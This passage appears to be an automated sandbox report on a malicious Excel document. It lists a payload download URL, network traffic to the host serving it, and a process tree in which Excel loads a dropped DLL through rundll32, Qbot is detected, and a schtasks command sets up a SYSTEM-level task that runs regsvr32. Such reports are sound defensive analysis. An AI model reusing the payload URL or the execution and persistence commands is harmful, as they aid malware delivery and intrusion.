,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,https://tidymasters.com.au/ds/0702.gif,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Apr 6, 2021 18:40:40.144581079 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:40.304791927 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:40.304889917 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:40.314846992 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:40.475006104 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:40.479857922 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:40.479908943 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:40.479944944 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:40.479993105 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:40.480681896 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:40.523565054 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:40.686618090 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:40.686862946 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.315865993 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.518805981 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.528260946 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.528326988 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.528366089 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.528404951 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.528441906 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.528489113 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.528522015 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.528558969 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.528595924 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.528631926 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.528913975 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.528953075 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.528956890 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.528959036 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.528961897 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.528964043 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.528965950 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.528968096 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.531744003 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.689726114 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.689786911 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.689941883 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.689941883 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.689982891 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.689999104 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690021992 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690026999 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690068007 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690072060 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690115929 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690125942 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690154076 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690154076 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690195084 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690206051 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690231085 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690234900 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690272093 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690284014 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690310955 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690311909 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690349102 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690362930 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690395117 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690397978 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690439939 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690450907 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690474033 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690479994 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690519094 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690529108 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690553904 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690557957 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690596104 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690606117 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690633059 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.690634966 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.690684080 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.695734978 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.850755930 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.850811958 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.850826025 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.850838900 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.850852013 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.850863934 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.850884914 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.850920916 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.850939989 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.850966930 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.850984097 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.851001978 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.851017952 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.851032972 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.851046085 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.851129055 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.851150990 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.851171970 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.851193905 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.851205111 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.851213932 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.851224899 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.851227999 CEST49165443192.168.2.22103.50.162.157
                                        Apr 6, 2021 18:40:42.851232052 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.851249933 CEST44349165103.50.162.157192.168.2.22
                                        Apr 6, 2021 18:40:42.851253986 CEST49165443192.168.2.22103.50.162.157

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Apr 6, 2021 18:40:39.593688011 CEST5219753192.168.2.228.8.8.8
                                        Apr 6, 2021 18:40:40.125211000 CEST53521978.8.8.8192.168.2.22
                                        Apr 6, 2021 18:40:41.017709970 CEST5309953192.168.2.228.8.8.8
                                        Apr 6, 2021 18:40:41.063716888 CEST53530998.8.8.8192.168.2.22
                                        Apr 6, 2021 18:40:41.069145918 CEST5283853192.168.2.228.8.8.8
                                        Apr 6, 2021 18:40:41.115091085 CEST53528388.8.8.8192.168.2.22
                                        Apr 6, 2021 18:40:41.677865982 CEST6120053192.168.2.228.8.8.8
                                        Apr 6, 2021 18:40:41.734606028 CEST53612008.8.8.8192.168.2.22
                                        Apr 6, 2021 18:40:41.741173029 CEST4954853192.168.2.228.8.8.8
                                        Apr 6, 2021 18:40:41.800092936 CEST53495488.8.8.8192.168.2.22

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Apr 6, 2021 18:40:39.593688011 CEST192.168.2.228.8.8.80x312aStandard query (0)tidymasters.com.auA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Apr 6, 2021 18:40:40.125211000 CEST8.8.8.8192.168.2.220x312aNo error (0)tidymasters.com.au103.50.162.157A (IP address)IN (0x0001)

                                        HTTPS Packets

                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                        Apr 6, 2021 18:40:40.479944944 CEST103.50.162.157443192.168.2.2249165CN=mail.tidymasters.com.au CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun Feb 14 13:18:07 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sat May 15 14:18:07 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:18:40:37
                                        Start date:06/04/2021
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                        Imagebase:0x13f270000
                                        File size:27641504 bytes
                                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:40:44
                                        Start date:06/04/2021
                                        Path:C:\Windows\System32\rundll32.exe
                                        Wow64 process (32bit):false
                                        Commandline:rundll32 ..\iojhsfgv.dvers,DllRegisterServer
                                        Imagebase:0xff940000
                                        File size:45568 bytes
                                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:40:45
                                        Start date:06/04/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32 ..\iojhsfgv.dvers,DllRegisterServer
                                        Imagebase:0xa80000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Yara matches:
                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.2102507416.0000000000420000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.2102454877.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.2102490286.00000000003E0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Start time:18:40:47
                                        Start date:06/04/2021
                                        Path:C:\Windows\SysWOW64\explorer.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                        Imagebase:0x540000
                                        File size:2972672 bytes
                                        MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000002.2370755015.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Start time:18:40:51
                                        Start date:06/04/2021
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54
                                        Imagebase:0xd60000
                                        File size:179712 bytes
                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:40:53
                                        Start date:06/04/2021
                                        Path:C:\Windows\System32\taskeng.exe
                                        Wow64 process (32bit):false
                                        Commandline:taskeng.exe {E6DEB525-2047-4F0F-A2D9-FEDA7F895D14} S-1-5-18:NT AUTHORITY\System:Service:
                                        Imagebase:0xff4c0000
                                        File size:464384 bytes
                                        MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Start time:18:40:53
                                        Start date:06/04/2021
                                        Path:C:\Windows\System32\regsvr32.exe
                                        Wow64 process (32bit):false
                                        Commandline:regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                                        Imagebase:0xff3e0000
                                        File size:19456 bytes
                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:40:53
                                        Start date:06/04/2021
                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                        Wow64 process (32bit):true
                                        Commandline: -s 'C:\Users\user\iojhsfgv.dvers'
                                        Imagebase:0x1c0000
                                        File size:14848 bytes
                                        MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Start time:18:42:00
                                        Start date:06/04/2021
                                        Path:C:\Windows\System32\regsvr32.exe
                                        Wow64 process (32bit):false
                                        Commandline:regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                                        Imagebase:0xffce0000
                                        File size:19456 bytes
                                        MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:42:00
                                        Start date:06/04/2021
                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                        Wow64 process (32bit):true
                                        Commandline: -s 'C:\Users\user\iojhsfgv.dvers'
                                        Imagebase:0x340000
                                        File size:14848 bytes
                                        MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Disassembly

                                        Code Analysis

                                        Reset < >